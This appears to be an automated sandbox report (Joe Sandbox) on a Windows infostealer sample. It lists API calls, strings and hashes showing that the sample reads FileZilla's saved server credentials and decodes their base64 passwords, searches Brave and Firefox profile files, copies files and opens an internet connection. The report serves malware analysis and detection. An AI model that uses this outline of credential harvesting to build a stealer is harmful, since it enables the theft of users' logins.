                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 1006159827-1013718255
                              • Opcode ID: 8ebf318f1947860f18923d7d9e327dd7357b31d1e23447bedc9ae69406ac4081
                              • Instruction ID: d9c048a3457816e496ec8600b8cedb29f66afea4af54fc1e705f5cf9013e0a08
                              • Opcode Fuzzy Hash: 8ebf318f1947860f18923d7d9e327dd7357b31d1e23447bedc9ae69406ac4081
                              • Instruction Fuzzy Hash: 8E625C31912A16AFCB23AF64DC49EAFB7B9EF55700F054128F806A7251DB74EE05CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6995
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003A69C8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A29
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A6A34
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A5D
                              • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 003A6A77
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A99
                              • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 003A6AA5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6AD0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6B00
                              • LocalAlloc.KERNEL32(00000040,?), ref: 003A6B35
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6B9D
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6BCD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 313953988-555421843
                              • Opcode ID: c05ea4ba83034cd6848a6f536a1aafbe7d50d9a1d1fdcb0cfc2418b87739fef6
                              • Instruction ID: 38a6cc857a34e7dcf9f9e57652759ac65ffc05cd2451336e2e2cc8d4e8cfea75
                              • Opcode Fuzzy Hash: c05ea4ba83034cd6848a6f536a1aafbe7d50d9a1d1fdcb0cfc2418b87739fef6
                              • Instruction Fuzzy Hash: E6427F71A11A06AFCB22ABB4DC8EEAF77B9EF15700F095458F901EB251DB34D905CB60
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DBC1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DBE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DBEF
                              • lstrlen.KERNEL32(003C4CA8), ref: 0039DBFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC17
                              • lstrcat.KERNEL32(00000000,003C4CA8), ref: 0039DC23
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC4C
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DC8F
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DCBF
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 0039DCD0
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 0039DCF0
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 0039DD0A
                              • lstrlen.KERNEL32(003BCFEC), ref: 0039DD1D
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DD47
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DD70
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DD7B
                              • lstrlen.KERNEL32(003C1794), ref: 0039DD86
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDA3
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DDAF
                              • lstrlen.KERNEL32(?), ref: 0039DDBC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDDF
                              • lstrcat.KERNEL32(00000000,?), ref: 0039DDED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DE19
                              • lstrlen.KERNEL32(003C1794), ref: 0039DE3D
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039DE6F
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DE7B
                              • lstrlen.KERNEL32(00F28BB8), ref: 0039DE8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DEB0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DEBB
                              • lstrlen.KERNEL32(003C1794), ref: 0039DEC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039DEE6
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DEF2
                              • lstrlen.KERNEL32(00F28A78), ref: 0039DF01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF27
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DF32
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFA5
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DFB1
                              • lstrlen.KERNEL32(00F28BB8), ref: 0039DFC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFE9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DFF4
                              • lstrlen.KERNEL32(003C1794), ref: 0039DFFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E022
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039E02E
                              • lstrlen.KERNEL32(00F28A78), ref: 0039E03D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E063
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039E06E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E09A
                              • StrCmpCA.SHLWAPI(?,Brave), ref: 0039E0CD
                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 0039E0E7
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E11F
                              • lstrlen.KERNEL32(00F2DB70), ref: 0039E12E
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E155
                              • lstrcat.KERNEL32(00000000,?), ref: 0039E15D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E19F
                              • lstrcat.KERNEL32(00000000), ref: 0039E1A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E1D0
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0039E1F9
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E22F
                              • lstrlen.KERNEL32(00F28A28), ref: 0039E23D
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E261
                              • lstrcat.KERNEL32(00000000,00F28A28), ref: 0039E269
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0039E988
                              • FindClose.KERNEL32(00000000), ref: 0039E997
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                              • String ID: Brave$Preferences$\Brave\Preferences
                              • API String ID: 1346089424-1230934161
                              • Opcode ID: bbca5f2e1d75fa86fb5834c92556d644a564cdca01c290d8dece5cd9f48bbcca
                              • Instruction ID: d36998c00765df16d6eafdc9ee79acef25e248dccc36731a99e15ca7831f53af
                              • Opcode Fuzzy Hash: bbca5f2e1d75fa86fb5834c92556d644a564cdca01c290d8dece5cd9f48bbcca
                              • Instruction Fuzzy Hash: 2F526D71911A06AFCF22EF65DC8AEAF77B9AF54700F054528F846AB251DB34DC05CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 003960FF
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396152
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396185
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003961B5
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003961F0
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396223
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00396233
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: e66bf118650be3c4aee82ea49e143092ce3e7fdd694048f2754f99e47dc62e60
                              • Instruction ID: acc55249727f5cffb1a2734c0fa7bda0b86c260b6546eb7ca9141bb6e19d1b68
                              • Opcode Fuzzy Hash: e66bf118650be3c4aee82ea49e143092ce3e7fdd694048f2754f99e47dc62e60
                              • Instruction Fuzzy Hash: A6522B72912A16AFDF22EBA4DC4AEAF77B9AF54300F154424F905EB251DB34EC05CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6B9D
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6BCD
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6BFD
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6C2F
                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 003A6C3C
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003A6C43
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 003A6C5A
                              • lstrlen.KERNEL32(00000000), ref: 003A6C65
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6CA8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6CCF
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 003A6CE2
                              • lstrlen.KERNEL32(00000000), ref: 003A6CED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6D30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6D57
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 003A6D6A
                              • lstrlen.KERNEL32(00000000), ref: 003A6D75
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6DB8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6DDF
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003A6DF2
                              • lstrlen.KERNEL32(00000000), ref: 003A6E01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6E49
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6E71
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003A6E94
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 003A6EA8
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 003A6EC9
                              • LocalFree.KERNEL32(00000000), ref: 003A6ED4
                              • lstrlen.KERNEL32(?), ref: 003A6F6E
                              • lstrlen.KERNEL32(?), ref: 003A6F81
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 2641759534-2314656281
                              • Opcode ID: 20e69ca38340c411cf3c5a1748559156ff904330d33fae1676bcb7fc558ea990
                              • Instruction ID: b956e13f7f114995cab2341ce3d43c237244bd863f315d790c494da44f68293a
                              • Opcode Fuzzy Hash: 20e69ca38340c411cf3c5a1748559156ff904330d33fae1676bcb7fc558ea990
                              • Instruction Fuzzy Hash: 54028031A11A16AFCB22ABB4DC4EEAF7BB9EF15704F095454F802EB241DF34D90587A0
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4B51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4B74
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A4B7F
                              • lstrlen.KERNEL32(003C4CA8), ref: 003A4B8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BA7
                              • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A4BB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BDE
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A4BFA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: prefs.js
                              • API String ID: 2567437900-3783873740
                              • Opcode ID: 8d34e544d9e0b94bd3347581c4330d9267c2cfed12fc27ba9838979cf7083695
                              • Instruction ID: 950965f7d1bacb0a19ec0573943d5fa6c254a7dffcc56dc6fe3b0afe3b99945d
                              • Opcode Fuzzy Hash: 8d34e544d9e0b94bd3347581c4330d9267c2cfed12fc27ba9838979cf7083695
                              • Instruction Fuzzy Hash: D7923171A11A019FDB26CF29C948B6AB7F5FF46314F1A80ADE809DB2A1D771DC41CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A1291
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12B4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A12BF
                              • lstrlen.KERNEL32(003C4CA8), ref: 003A12CA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12E7
                              • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A12F3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A131E
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A133A
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A135C
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A1376
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A13AF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A13D7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A13E2
                              • lstrlen.KERNEL32(003C1794), ref: 003A13ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A140A
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1416
                              • lstrlen.KERNEL32(?), ref: 003A1423
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1443
                              • lstrcat.KERNEL32(00000000,?), ref: 003A1451
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A147A
                              • StrCmpCA.SHLWAPI(?,00F2DAC8), ref: 003A14A3
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A14E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A150D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1535
                              • StrCmpCA.SHLWAPI(?,00F2E2D8), ref: 003A1552
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A1593
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A15BC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A15E4
                              • StrCmpCA.SHLWAPI(?,00F2D9D8), ref: 003A1602
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1633
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A165C
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A1685
                              • StrCmpCA.SHLWAPI(?,00F2D9A8), ref: 003A16B3
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A16F4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A171D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1745
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A1796
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17BE
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A17F5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 003A181C
                              • FindClose.KERNEL32(00000000), ref: 003A182B
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: ac5e0573f032610b325092ac884bb234f726ca614dcc2591f1c09ce3f396bb62
                              • Instruction ID: 251854fb810a23b1faf6188276ca2a1b5de144d2c29b802d39a3a34c27dfe7e6
                              • Opcode Fuzzy Hash: ac5e0573f032610b325092ac884bb234f726ca614dcc2591f1c09ce3f396bb62
                              • Instruction Fuzzy Hash: 0C124771A11A069FCF26EF79D889AAF77B8EF55300F054528F846EB250DB34DC458B90
                              APIs
                              • wsprintfA.USER32 ref: 003ACBFC
                              • FindFirstFileA.KERNEL32(?,?), ref: 003ACC13
                              • lstrcat.KERNEL32(?,?), ref: 003ACC5F
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003ACC71
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003ACC8B
                              • wsprintfA.USER32 ref: 003ACCB0
                              • PathMatchSpecA.SHLWAPI(?,00F288D8), ref: 003ACCE2
                              • CoInitialize.OLE32(00000000), ref: 003ACCEE
                                • Part of subcall function 003ACAE0: CoCreateInstance.COMBASE(003BB110,00000000,00000001,003BB100,?), ref: 003ACB06
